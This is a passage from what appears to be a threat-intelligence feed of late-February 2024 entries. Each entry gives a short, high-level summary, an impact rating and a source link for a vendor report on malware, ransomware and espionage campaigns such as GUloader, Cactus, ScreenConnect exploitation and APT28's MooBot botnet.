McAfee Labs
Intel Name:
GUloader_Encryption_Strategies_Unmasked
Date of Scan:
2024-02-29
Impact:
LOW
Summary:
McAfee researchers have unmasked GUloader and analyzed the threat posed by its use of malicious SVG files. GUloader utilizes dynamic structural changes, employing polymorphic code and encryption to effectively hide from antivirus software and intrusion detection systems.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/guloader-unmasked-decrypting-the-threat-of-malicious-svg-files/
2024-02-29
Savvy_Seahorse_tricks_victims_to_fake_investment_platforms
LOW
+
Intel Source:
Infoblox
Intel Name:
Savvy_Seahorse_tricks_victims_to_fake_investment_platforms
Date of Scan:
2024-02-29
Impact:
LOW
Summary:
Savvy Seahorse is a DNS threat actor who convinces victims to create accounts on fake investment platforms and make deposits to a personal account, and then transfers those deposits to a bank in Russia. This actor uses Facebook ads to lure users into their websites and ultimately enroll in fake investment platforms. The campaign themes often involve spoofing well-known companies like Tesla, Facebook/Meta, and Imperial Oil, among others.
Source: https://blogs.infoblox.com/cyber-threat-intelligence/beware-the-shallow-waters-savvy-seahorse-lures-victims-to-fake-investment-platforms-through-facebook-ads/
2024-02-29
Malvertising_Continues_to_Drop_Rhadamanthys
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Malvertising_Continues_to_Drop_Rhadamanthys
Date of Scan:
2024-02-29
Impact:
LOW
Summary:
The first time the Rhadamanthys stealer was spotted in public, it was transmitted through malicious advertisements just over a year ago. Malwarebytes researchers have seen a persistence of software download-related malvertising chains in 2023.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/02/one-year-later-rhadamanthys-is-still-dropped-via-malvertising
2024-02-28
Possible_Imposter_Ransomware_Impersonating_LOCKBIT_4
HIGH
+
Intel Source:
PaloAlto
Intel Name:
Possible_Imposter_Ransomware_Impersonating_LOCKBIT_4
Date of Scan:
2024-02-28
Impact:
HIGH
Summary:
There is a lot of interest in LockBit 4.0 now that it is back online following its disruption in February 2024. Similar to others, PaloAlto researchers have discovered potential imposters using the Lockbit 4.0 identity on VirusTotal.
Source: https://twitter.com/Unit42_Intel/status/1762570867291070880
2024-02-28
Cactus_ransomware_attack_on_corporate_networks
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
Cactus_ransomware_attack_on_corporate_networks
Date of Scan:
2024-02-28
Impact:
MEDIUM
Summary:
Bitdefender Labs recently investigated an attack that illustrates the growing risk of ransomware attacks. This attack was orchestrated by the threat actor CACTUS, who began by exploiting a software vulnerability less than 24 hours after its initial disclosure. Bitdefender notes that a publicly known Remote Code Execution (RCE) proof-of-concept (PoC) had remained unaddressed for over 24 hours. They suspect that the systems were compromised with a web shell.
Source: https://www.bitdefender.com/blog/businessinsights/cactus-analyzing-a-coordinated-ransomware-attack-on-corporate-networks/
2024-02-28
Iranian_Threat_Actor_UNC1549_Targets_Israeli_and_Middle_East_Aerospace_and_Defense_Sectors
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
Iranian_Threat_Actor_UNC1549_Targets_Israeli_and_Middle_East_Aerospace_and_Defense_Sectors
Date of Scan:
2024-02-28
Impact:
MEDIUM
Summary:
Mandiant shared their blog post about suspected Iran espionage activity attacking the aerospace, aviation, and defense industries in Middle Eastern countries, including Israel and the United Arab Emirates (UAE) and possibly Turkey, India, and Albania. Mandiant links this activity with some confidence to the Iranian actor UNC1549, which overlaps with Tortoiseshell—a threat actor that has been publicly linked to Iran’s Islamic Revolutionary Guard Corps (IRGC).
Source: https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east
2024-02-28
New_Variant_of_Atomic_Stealer_in_the_wild
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
New_Variant_of_Atomic_Stealer_in_the_wild
Date of Scan:
2024-02-28
Impact:
MEDIUM
Summary:
During some investigations, the Bitdefender team was able to isolate multiple suspicious and undetected macOS disk image files that were surprisingly small for files of this kind (1.3 MB per file). The new variant drops and uses a Python script to stay covert. The malware also shares a similar code with the RustDoor backdoor.
Source: https://www.bitdefender.com/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/
2024-02-28
Exploring_DLL_Hijacking
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Exploring_DLL_Hijacking
Date of Scan:
2024-02-28
Impact:
MEDIUM
Summary:
Unit 42 Palo Alto explained in their article how threat actors use DLL hijacking in malware attacks. It also shares ideas for how to better detect DLL hijacking and best practices on how to reduce the risk of attack. Dynamic-link library (DLL) hijacking is one of the oldest techniques that both threat actors and offensive security professionals continue to use today.
Source: https://unit42.paloaltonetworks.com/dll-hijacking-techniques/#post-132679-_ydqdbjg0dngh
2024-02-28
MooBot_Threat_Detected_on_Ubiquiti_EdgeRouters
MEDIUM
+
Intel Source:
IC3
Intel Name:
MooBot_Threat_Detected_on_Ubiquiti_EdgeRouters
Date of Scan:
2024-02-28
Impact:
MEDIUM
Summary:
In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries are urging users of Ubiquiti EdgeRouter to take protective measures, weeks after a botnet comprising infected routers was felled by law enforcement as part of an operation codenamed Dying Ember. The MooBot botnet is being utilized by APT28, a threat actor associated with Russia, to enable clandestine cyber operations and disseminate personalized malware for subsequent exploitation. Connected to the Russian Federation's Main Directorate of the General Staff (GRU), APT28 has been operational since at least 2007.
Source: https://www.ic3.gov/Media/News/2024/240227.pdf
2024-02-28
Ivanti_Connect_Secure_VPN_Vulnerabilities_Exploited_by_China_Linked_Threat_Actors
LOW
+
Intel Source:
Mandiant
Intel Name:
Ivanti_Connect_Secure_VPN_Vulnerabilities_Exploited_by_China_Linked_Threat_Actors
Date of Scan:
2024-02-28
Impact:
LOW
Summary:
This article explores the investigation into the exploitation and persistence attempts of Ivanti Connect Secure VPN vulnerabilities in a series called "Cutting Edge, Part 3." Additionally, Mandiant has identified UNC5325 employing living-off-the-land techniques and deploying new malware like LITTLELAMB to enhance evasion of detection.
Source: https://www.mandiant.com/resources/blog/investigating-ivanti-exploitation-persistence
2024-02-28
The_ALPHV_Blackcat_ransomware_updates
HIGH
+
Intel Source:
CISA
Intel Name:
The_ALPHV_Blackcat_ransomware_updates
Date of Scan:
2024-02-28
Impact:
HIGH
Summary:
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as February 2024.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a
2024-02-28
Lazarus_new_malicious_PyPI_packages
MEDIUM
+
Intel Source:
JPCert
Intel Name:
Lazarus_new_malicious_PyPI_packages
Date of Scan:
2024-02-28
Impact:
MEDIUM
Summary:
JPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI, the official Python package repository.
Source: https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html
2024-02-27
The_Dark_Web_Profile_of_Patchwork_APT
LOW
+
Intel Source:
SOC Radar
Intel Name:
The_Dark_Web_Profile_of_Patchwork_APT
Date of Scan:
2024-02-27
Impact:
LOW
Summary:
The Patchwork APT group is an Indian cyber espionage group that was discovered in December 2015; however, it has likely been operating since 2009. It primarily targets defense, diplomatic, and government agencies, focusing on high-profile organizations in South and Southeast Asia but increasingly expanding to other regions. Patchwork is a prominent threat in the cyber threat landscape because it uses a variety of specialized tools and techniques for espionage, including spear phishing and watering hole attacks.
Source: https://socradar.io/dark-web-profile-patchwork-apt/
2024-02-27
The_Abyss_Locker_ransomware_roundup_report
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
The_Abyss_Locker_ransomware_roundup_report
Date of Scan:
2024-02-27
Impact:
MEDIUM
Summary:
FortiGuard Labs monitors and collects data on ransomware variants of interest that have been gaining traction within their datasets and the OSINT community. This edition of their ransomware roundup covers the Abyss Locker (AbyssLocker) ransomware.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-abyss-locker
2024-02-27
Adversaries_Exploiting_ScreenConnect_Vulnerability_SlashAndGrab
LOW
+
Intel Source:
Huntress
Intel Name:
Adversaries_Exploiting_ScreenConnect_Vulnerability_SlashAndGrab
Date of Scan:
2024-02-27
Impact:
LOW
Summary:
Huntress has observed a surge in threat actor activity exploiting the ScreenConnect vulnerability dubbed "SlashAndGrab." This article details various post-exploitation tradecraft employed by adversaries, including deploying ransomware (e.g., LockBit), running cryptocurrency miners, installing additional remote access tools (e.g., SimpleHelp, SSH, Google Chrome Remote Desktop), dropping Cobalt Strike beacons, and establishing persistence through user creation and reverse shell techniques. The article emphasizes the need for continued vigilance and highlights the importance of a proactive and experienced security approach to thwart adversaries.
Source: https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
2024-02-27
InstallsKey_PPI_Service_Malware
LOW
+
Intel Source:
Bitsight
Intel Name:
InstallsKey_PPI_Service_Malware
Date of Scan:
2024-02-27
Impact:
LOW
Summary:
A new string encryption method and an alternate communication protocol have been added to PrivateLoader, a popular malware downloader. It now also downloads a copy of itself alongside its other payloads. Recent samples are packed with the commercial packer VMProtect, which makes them more difficult to analyze and reverse engineer.
Source: https://www.bitsight.com/blog/hunting-privateloader-malware-behind-installskey-ppi-service
2024-02-27
Examining_DCRat_in_Depth
LOW
+
Intel Source:
Any.Run
Intel Name:
Examining_DCRat_in_Depth
Date of Scan:
2024-02-27
Impact:
LOW
Summary:
DCRat, also referred to as Dark Crystal RAT, is a remote access trojan (RAT) initially released in 2018. The malware is modular, meaning it can be extended to carry out various functions: for example, it can take over Steam and Telegram accounts, steal passwords, and collect information from cryptocurrency wallets. Attackers can distribute DCRat in a number of ways, although phishing email campaigns are the most common.
Source: https://any.run/malware-trends/dcrat
2024-02-27
TimbreStealer_campaign_targets_Mexican_users
LOW
+
Intel Source:
Cisco Talos
Intel Name:
TimbreStealer_campaign_targets_Mexican_users
Date of Scan:
2024-02-27
Impact:
LOW
Summary:
Cisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown malware that Talos is calling "TimbreStealer." This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques, and procedures (TTPs) to distribute a banking trojan known as "Mispadu."
Source: https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/
2024-02-27
The_Gootloader_Tale_Goes_On
LOW
+
Intel Source:
The DFIR Report
Intel Name:
The_Gootloader_Tale_Goes_On
Date of Scan:
2024-02-27
Impact:
LOW
Summary:
Researchers from The DFIR Report analyzed an intrusion from February 2023. The intrusion began with a user downloading and running a file from an SEO-poisoned search result, which resulted in a Gootloader infection. By using SystemBC to tunnel RDP access into the network, the threat actor was able to compromise backup servers, domain controllers, and other important systems.
Source: https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/
2024-02-27
Agent_Tesla_malware_targets_travel_industry
LOW
+
Intel Source:
Forcepoint
Intel Name:
Agent_Tesla_malware_targets_travel_industry
Date of Scan:
2024-02-27
Impact:
LOW
Summary:
Forcepoint analysts examined an Agent Tesla-style campaign that is delivered via email as a PDF attachment and ends up downloading a RAT, leaving the system infected. The email was an example of scamming and brand impersonation: the sender claims to be seeking a refund for a reservation made at Booking.com and asks the recipient to check the attached PDF for the card statement.
Source: https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry
2024-02-27
Phishing_Scripts_Exploit_Telegram_for_User_Information_Theft
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Phishing_Scripts_Exploit_Telegram_for_User_Information_Theft
Date of Scan:
2024-02-27
Impact:
MEDIUM
Summary:
AhnLab Security Intelligence Center (ASEC) has identified a surge in phishing scripts utilizing Telegram for the indiscriminate distribution of malicious content, often themed around remittances and receipts. These sophisticated scripts, unlike their predecessors, employ obfuscation techniques to evade detection. Upon interaction, users are prompted to enter a password, enabling threat actors to steal sensitive information, including email addresses and passwords. The stolen data is then transmitted to the attackers via the Telegram API. This method of leveraging Telegram for information theft is becoming increasingly prevalent, emphasizing the importance of vigilance against suspicious files and websites.
Source: https://asec.ahnlab.com/en/62177/
2024-02-27
Black_Basta_Exploiting_ScreenConnect_Vulnerabilities
HIGH
+
Intel Source:
TrendMicro
Intel Name:
Black_Basta_Exploiting_ScreenConnect_Vulnerabilities
Date of Scan:
2024-02-27
Impact:
HIGH
Summary:
Researchers from TrendMicro have thoroughly examined the most recent ScreenConnect vulnerabilities. They also talk about how the data led them to identify threat actor groups that are actively using CVE-2024-1708 and CVE-2024-1709, such as the Black Basta and Bl00dy Ransomware gangs.
Source: https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
2024-02-27
The_observed_new_PIKABOT_campaigns
LOW
+
Intel Source:
Elastic
Intel Name:
The_observed_new_PIKABOT_campaigns
Date of Scan:
2024-02-27
Impact:
LOW
Summary:
Elastic Security Labs observed new PIKABOT campaigns, including an updated version of the malware. PIKABOT is a widely deployed loader that malicious actors use to distribute additional payloads.
Source: https://www.elastic.co/security-labs/pikabot-i-choose-you
2024-02-27
New_Version_of_IDAT_Loader_Pushes_Remcos_RAT_with_Steganography
LOW
+
Intel Source:
Morphisec
Intel Name:
New_Version_of_IDAT_Loader_Pushes_Remcos_RAT_with_Steganography
Date of Scan:
2024-02-27
Impact:
LOW
Summary:
Researchers at Morphisec Threat Labs have found several indicators of attacks attributed to the threat actor UAC-0184. The finding sheds light on the infamous IDAT loader, which delivered the Remcos Remote Access Trojan (RAT) to a Ukrainian organization with headquarters in Finland.
Source: https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga
2024-02-26
NovaStealer_Deployer
LOW
+
Intel Source:
Phylum
Intel Name:
NovaStealer_Deployer
Date of Scan:
2024-02-26
Impact:
LOW
Summary:
The article discusses a recent discovery by the Phylum Research Team of a dormant PyPI package, django-log-tracker, that was updated to deploy the NovaSentinel stealer. The update included malicious code, indicating either a calculated strategy by an attacker or a compromise of the PyPI account. The malware was found to be a steal-everything-you-can-find stealer, designed to harvest sensitive information. The article also highlights the risks of supply-chain attacks through compromised PyPI accounts and urges developers to be cautious when using open-source software.
Source: https://blog.phylum.io/dormant-pypi-package-updated-to-deploy-novasentinel-stealer/
2024-02-26
Critical_ConnectWise_ScreenConnect_Authentication_Bypass
HIGH
+
Intel Source:
Bitdefender
Intel Name:
Critical_ConnectWise_ScreenConnect_Authentication_Bypass
Date of Scan:
2024-02-26
Impact:
HIGH
Summary:
On February 19, 2024, ConnectWise released a security patch addressing two vulnerabilities in the ScreenConnect software, potentially leading to Remote Code Execution (RCE). These vulnerabilities, identified as CVE-2024-1709 and CVE-2024-1708, allow attackers to bypass authentication and perform path traversal, respectively, enabling unauthorized access and administrative privilege escalation.
Source: https://www.bitdefender.com/blog/businessinsights/technical-advisory-critical-connectwise-screenconnect-authentication-bypass/
2024-02-26
Unmasking_Lorenz_Ransomware
MEDIUM
+
Intel Source:
NCC Group
Intel Name:
Unmasking_Lorenz_Ransomware
Date of Scan:
2024-02-26
Impact:
MEDIUM
Summary:
The article discusses the evolving tactics of the ransomware group Lorenz, which has been targeting small to medium businesses globally. The group has recently adopted double-extortion tactics and made changes to their encryption methods and file names. They also use scheduled tasks and local admin accounts for persistence. The article provides indicators of compromise and stresses the need for continuous monitoring to stay protected against ransomware threats.
Source: https://research.nccgroup.com/2024/02/22/unmasking-lorenz-ransomware-a-dive-into-recent-tactics-techniques-and-procedures/
2024-02-26
Dissecting_Earth_Luscas_Espionage_Campaign_Leveraging_Geopolitical_Lures
LOW
+
Intel Source:
Trendmicro
Intel Name:
Dissecting_Earth_Luscas_Espionage_Campaign_Leveraging_Geopolitical_Lures
Date of Scan:
2024-02-26
Impact:
LOW
Summary:
Trend Micro's investigation has uncovered a cyber espionage campaign by Earth Lusca, a China-linked threat actor, exploiting Chinese-Taiwanese tensions. Active around the Taiwanese national elections in late 2023 to early 2024, the campaign used spear-phishing with geopolitical lures to deliver a complex, multi-stage infection process, ultimately deploying Cobalt Strike payloads. Further analysis suggests a link between Earth Lusca and the Chinese company I-Soon, indicating a broader network of cyber espionage tied to Chinese interests. This campaign highlights the ongoing risks of state-linked cyber operations targeting politically sensitive entities.
Source: https://www.trendmicro.com/en_us/research/24/b/earth-lusca-uses-geopolitical-lure-to-target-taiwan.html
2024-02-26
Blind_Eagle_Targets_Manufacturing_with_Advanced_Crypters_and_Payloads
LOW
+
Intel Source:
Esentire
Intel Name:
Blind_Eagle_Targets_Manufacturing_with_Advanced_Crypters_and_Payloads
Date of Scan:
2024-02-26
Impact:
LOW
Summary:
Blind Eagle threat actors have been observed targeting the manufacturing sector, distributing malicious VBS files through phishing emails containing links to RAR and BZ2 archives. eSentire observed the Blind Eagle threat actor(s) targeting Spanish-speaking users in the manufacturing industry based in North America.
Source: https://www.esentire.com/blog/blind-eagles-north-american-journey
2024-02-26
Uncovering_Nood_RAT_Persistent_Linux_Threat
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Uncovering_Nood_RAT_Persistent_Linux_Threat
Date of Scan:
2024-02-26
Impact:
MEDIUM
Summary:
The AhnLab Security Intelligence Center (ASEC) has reported the discovery and ongoing analysis of Nood RAT, a Linux-targeting malware variant of the widely known Gh0st RAT. Originating from a lineage of malware with open-source roots primarily utilized by Chinese-speaking threat actors, Nood RAT has been actively used in cyber attacks since 2018, exploiting vulnerabilities across various systems. This malware exhibits sophisticated capabilities, including masquerading as legitimate processes, encrypted communication with command and control (C&C) servers, and executing malicious activities such as file manipulation and proxy usage. Despite its simplicity, Nood RAT's evasion techniques and the breadth of its deployment highlight the critical need for up-to-date system security and vigilant monitoring to combat such threats.
Source: https://asec.ahnlab.com/en/62144/
2024-02-26
Analysis_of_the_PyRation_family_malware
LOW
+
Intel Source:
Stratosphereips Blog
Intel Name:
Analysis_of_the_PyRation_family_malware
Date of Scan:
2024-02-26
Impact:
LOW
Summary:
Stratosphereips researchers published a blog post with a technical analysis of malware they link to a variant of the "PyRation" family. This malware is a Python executable packaged as a Windows PE file, meaning it works only on Windows.
Source: https://www.stratosphereips.org/blog/2024/2/23/analysis-and-understanding-of-malware-of-the-pyration-family
2024-02-26
TikTok_Misinformation_Combat
LOW
+
Intel Source:
Talos
Intel Name:
TikTok_Misinformation_Combat
Date of Scan:
2024-02-26
Impact:
LOW
Summary:
The article discusses TikTok's efforts to address misinformation and disinformation on its platform, emphasizing that this is a global issue. It also mentions the abuse of Google Cloud Run for distributing malware and provides updates on cybersecurity news and events.
Source: https://blog.talosintelligence.com/threat-source-newsletter-feb-22-2024/
2024-02-26
A_new_remote_access_trojan_Xeno_RAT
LOW
+
Intel Source:
Cyfirma
Intel Name:
A_new_remote_access_trojan_Xeno_RAT
Date of Scan:
2024-02-26
Impact:
LOW
Summary:
Cyfirma provided an in-depth analysis of the proliferation of Xeno RAT, a malware with advanced functionality that is freely available on GitHub. Xeno RAT has the sophisticated capabilities and characteristics of advanced malware. A threat actor customized its settings and distributed it via the Discord CDN.
Source: https://www.cyfirma.com/outofband/xeno-rat-a-new-remote-access-trojan-with-advance-capabilities/
2024-02-26
Targeted_Cyber_Attack_Against_Ukrainian_Defense_Forces_Thwarted
LOW
+
Intel Source:
CERT-UA
Intel Name:
Targeted_Cyber_Attack_Against_Ukrainian_Defense_Forces_Thwarted
Date of Scan:
2024-02-26
Impact:
LOW
Summary:
Ukrainian cybersecurity teams thwarted a targeted cyber attack against the Ukrainian Defense Forces, delivered via a malicious Excel document spread through Signal messenger. The attack involved a complex chain of actions including the execution of a malicious PowerShell script, COOKBOX, designed to compromise and control affected systems. The attack, part of ongoing efforts since autumn 2023, exploited systems lacking basic security measures. The response highlighted the critical role of advanced security technologies like EDR in preventing such breaches and underscored the necessity for immediate implementation of comprehensive security policies to protect against sophisticated cyber threats.
Source: https://cert.gov.ua/article/6277849
2024-02-23
The_DarkVNC_Technical_Analysis
LOW
+
Intel Source:
Esentire
Intel Name:
The_DarkVNC_Technical_Analysis
Date of Scan:
2024-02-23
Impact:
LOW
Summary:
DarkVNC is a hidden utility based on VNC technology, used for stealthy remote access. It was advertised in 2016 and received updates until 2017. DarkVNC has been used by threat actors associated with IcedID and SolarMarker campaigns. This analysis focuses on a DarkVNC sample that uses 'vncdll64.dll' for exporting functions. It generates a unique ID to send to the C2 server along with system info. DarkVNC can search for and manipulate windows related to the desktop environment. It can also control the state of devices like keyboard and mouse, and block user input. The malware gathers details on the Chrome browser install and runs cmd prompts. Detection and prevention controls like EDR solutions and training programs are recommended.
Source: https://www.esentire.com/blog/technical-analysis-of-darkvnc
2024-02-23
8220_Group_Gang_Launches_Cryptomining_Campaign
LOW
+
Intel Source:
Uptycs
Intel Name:
8220_Group_Gang_Launches_Cryptomining_Campaign
Date of Scan:
2024-02-23
Impact:
LOW
Summary:
Uptycs researchers have discovered a new cryptomining campaign conducted by the 8220 Group, targeting both Linux and Windows systems. This recent campaign stands out due to the use of Windows PowerShell for fileless execution, resulting in the deployment of a cryptominer. What distinguishes this campaign is its adoption of unique techniques, such as DLL sideloading, User Account Control (UAC) bypass, and modifications to AmsiScanBuffer and EtwEventWrite. These tactics represent a novel approach, highlighting the group's innovative methods to enhance stealth and evasion, setting it apart from previous incidents. Notably, the Linux campaign showed no significant alterations in its tactics.
Source: https://www.uptycs.com/blog/8220-gang-cryptomining-cloud-based-infrastructure-cyber-threat
2024-02-23
The_Pikabot_rising_threat
MEDIUM
+
Intel Source:
Esentire
Intel Name:
The_Pikabot_rising_threat
Date of Scan:
2024-02-23
Impact:
MEDIUM
Summary:
The article "The Rising Threat of Pikabot" by eSentire discusses the increasing danger of the Pikabot malware and the capabilities of eSentire's 24/7 Security Operations Centers (SOCs) in responding to threats. The article also highlights the TRU team's discovery of other dangerous threats, such as the Kaseya MSP breach and the more_eggs malware. The article provides a detailed analysis of the Pikabot malware, including its initial infection through a phishing email and its use of obfuscation techniques. It also explains how Pikabot is injected into the SearchProtocolHost.exe process and its functionality to gather host information and check for specific language settings. The article also discusses additional insights, such as unsuccessful infection attempts and recommendations from the TRU team for the prevention and detection of Pikabot.
Source: https://www.esentire.com/blog/the-rising-threat-of-pikabot
2024-02-23
LATAM_Malware_Variants
LOW
+
Intel Source:
Crowdstrike
Intel Name:
LATAM_Malware_Variants
Date of Scan:
2024-02-23
Impact:
LOW
Summary:
The article provides an overview of updates and changes made to various malware families targeting users in Latin America (LATAM) in 2023. These include Mispadu, Kiron, Caiman, Culebra, Salve, and Astaroth, which primarily target users in Brazil, Spain, Italy, and Australia. The updates include the use of CAPTCHAs, new components in the infection chain, and new obfuscation methods. The article also discusses the potential overlap between Mispadu and Astaroth, as well as a new threat called Doit. It then delves into the technical details of these malware variants, including encryption and decryption methods, deployment chains, and C2 protocols. The article also provides recommendations to avoid or detect eCrime commodity malware infections and lists indicators of compromise. It concludes by discussing a new Brazilian-based adversary, SAMBA SPIDER, and providing details on specific malware families and their tactics, techniques, and procedures. The article also includes a case study of updates made to the Caiman downloader in September 2023.
Source: https://www.crowdstrike.com/blog/latin-america-malware-update/
2024-02-23
Angel_Crypto_Drainer
LOW
+
Intel Source:
Sucuri
Intel Name:
Angel_Crypto_Drainer
Date of Scan:
2024-02-23
Impact:
LOW
Summary:
The article discusses the growing threat of Web3 crypto malware, specifically the Angel Drainer, which targets individuals interested in cryptocurrencies and NFTs. The authors provide an overview of the current list of top level domains maintained by IANA and mention a placeholder domain used by the malware. They also discuss the use of the "Ipsum" domain in phishing sites and the high number of scans recorded by URLScan.io. The article provides statistics on the number of unique domain names and titles associated with the malware, as well as the top three second level domains used. It also discusses the steps website owners can take to protect their sites from these types of attacks. The authors then delve into the specifics of the Angel Drainer malware, including its use of crypto drainers to steal and redistribute assets from compromised wallets. They also mention the surge in malicious activity linked to recent security breaches and the use of phishing tactics to trick users into giving up their cryptocurrency assets. The article also discusses the benefits of using a web application firewall and offers services to remove malware infections and secure websites. The authors provide an analysis of the threat of malicious injections in the Web3 ecosystem and describe a specific malware injection targeting WordPress sites. They also discuss the various waves of attacks carried out by the Angel Drainer malware and provide information on the top 50 most common titles for phishing pages used by the drainer. The article also mentions the use of an ACCESS_KEY by the drainer and its connection to the Rilide Stealer. It also provides information on phishing subdomains on the website Vercel.app and the number of phishing web.app subdomains found in relation to Firebase Hosting. The authors also discuss a new type of malware that targets Web3 crypto users and provide details on the different versions of the malware. They also mention the investigation into a malware that impersonates the BillionAir Web3 gambling platform and provide information on suspicious requests made by the drainer. The article concludes by mentioning the 530 phishing pages found on subdomains of the website pages.dev, which is hosted on Cloudflare Pages.
Source: https://blog.sucuri.net/2024/02/web3-crypto-malware-angel-drainer.html
2024-02-23
New_MaaS_InfoStealer_Malware_Campaign
LOW
+
Intel Source:
Cofense
Intel Name:
New_MaaS_InfoStealer_Malware_Campaign
Date of Scan:
2024-02-23
Impact:
LOW
Summary:
Cofense researchers discussed in their post a new phishing campaign targeting the oil and gas industry, which uses a recently updated Malware-as-a-Service called Rhadamanthys Stealer. The campaign starts with a phishing email and leads to a clickable PDF file that downloads the malware. The Rhadamanthys Stealer is written in C++ and has various features to steal information. The article also mentions that the malware recently received a major update, making it more customizable for threat actors. A table of indicators of compromise is provided, and the article concludes by stating that more details will be provided in the future.
Source: https://cofense.com/blog/new-maas-infostealer-malware-campaign-targeting-oil-gas-sector/
2024-02-23
Anti_Sandbox_Techniques
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Anti_Sandbox_Techniques
Date of Scan:
2024-02-23
Impact:
LOW
Summary:
ISC.SANS researchers examined a malware sample and found that several of its anti-sandbox methods rely on simple checks that are easily performed in a plain Windows batch (.bat) script. They also came across an intriguing one that downloads the subsequent payload only after performing a simple check.
Source: https://isc.sans.edu/diary/Simple+AntiSandbox+Technique+Wheres+The+Mouse/30684/
2024-02-23
Russian_Aligned_Influence_Operation_Affecting_German_Audiences
LOW
+
Intel Source:
Sentinel Labs
Intel Name:
Russian_Aligned_Influence_Operation_Affecting_German_Audiences
Date of Scan:
2024-02-23
Impact:
LOW
Summary:
Researchers at SentinelLabs have closely monitored the activities of an alleged Russia-aligned influence operation network named Doppelgänger. Their observations reveal that Doppelgänger has been specifically targeting German audiences, a trend aligned with recent reports from the German Ministry of Foreign Affairs and Der Spiegel.
Source: https://www.sentinelone.com/labs/doppelganger-russia-aligned-influence-operation-targets-germany/
2024-02-23
Kimsuky_abuses_a_valid_certificate_to_distribute_TrollAgent
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Kimsuky_abuses_a_valid_certificate_to_distribute_TrollAgent
Date of Scan:
2024-02-23
Impact:
MEDIUM
Summary:
A malicious TrollAgent malware was found to be downloaded when attempting to install security software from a South Korean construction association website. The malware can steal information and receive commands from attackers. Users should keep antivirus software updated to prevent infection.
Source: https://asec.ahnlab.com/ko/61666/
2024-02-22
Konni_RAT_Malware_Backdoored_into_Russian_Government_Software
LOW
+
Intel Source:
Medium
Intel Name:
Konni_RAT_Malware_Backdoored_into_Russian_Government_Software
Date of Scan:
2024-02-22
Impact:
LOW
Summary:
An installer for a utility likely used by the Russian Consular Department of the Ministry of Foreign Affairs (MID) has been backdoored to distribute the remote access trojan Konni RAT (also known as UpDog). According to DCSO experts, embedding Konni RAT in software installers is a tactic the group used back in October 2023, when the trojan was found being distributed through a backdoored copy of the Russian tax filing software Spravki BK. The utility named 'Statistika KZU' (Статистика КЗУ) appears to be the target of this backdoored installer.
Source: https://medium.com/@DCSO_CyTec/to-russia-with-love-assessing-a-konni-backdoored-suspected-russian-consular-software-installer-ce618ea4b8f3
2024-02-22
Malware_Compromises_Personal_Data_Through_Vibrator_Infection
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Malware_Compromises_Personal_Data_Through_Vibrator_Infection
Date of Scan:
2024-02-22
Impact:
LOW
Summary:
The article explores an incident involving the infection of a vibrator, specifically the Spencer's Sexology Pussy Power 8-Function Rechargeable Bullet Vibrator, with an information stealer named Lumma. Lumma operates on a Malware-as-a-Service (MaaS) model, where cybercriminals acquire access to malicious software and its infrastructure by paying other cybercriminals. Lumma's primary function is to steal information from cryptocurrency wallets, browser extensions, and two-factor authentication details. While Lumma is commonly distributed through email campaigns, this case highlights its potential spread through infected USB drives as well.
Source: https://www.malwarebytes.com/blog/news/2024/02/vibrator-virus-steals-your-personal-information
2024-02-22
A_discovery_of_the_phishing_as_a_service_Tycoon_Group
LOW
+
Intel Source:
Trustwave
Intel Name:
A_discovery_of_the_phishing_as_a_service_Tycoon_Group
Date of Scan:
2024-02-22
Impact:
LOW
Summary:
A phishing-as-a-service called Tycoon Group was discovered recently. It uses sophisticated techniques like WebSocket for data exfiltration and Cloudflare for evading detection. Available since August 2023, it enables easy deployment of phishing pages mimicking Microsoft and Google login. It provides an admin panel to manage campaigns and view stolen credentials.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/breakdown-of-tycoon-phishing-as-a-service-system/
2024-02-22
DDoS_Botnet_Lucifer_Targeting_Apache_Big_Data_Stack
MEDIUM
+
Intel Source:
Aqua Sec
Intel Name:
DDoS_Botnet_Lucifer_Targeting_Apache_Big_Data_Stack
Date of Scan:
2024-02-22
Impact:
MEDIUM
Summary:
Researchers from Aqua Security have revealed a new campaign targeting the Apache Hadoop and Apache Druid big-data stacks. Further research found that the attacker exploits known vulnerabilities and misconfigurations in these Apache services, as observed against the researchers' cloud honeypots.
Source: https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/
2024-02-21
Malicious_Campaigns_Exploiting_Google_Cloud_Run_in_LATAM
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
Malicious_Campaigns_Exploiting_Google_Cloud_Run_in_LATAM
Date of Scan:
2024-02-21
Impact:
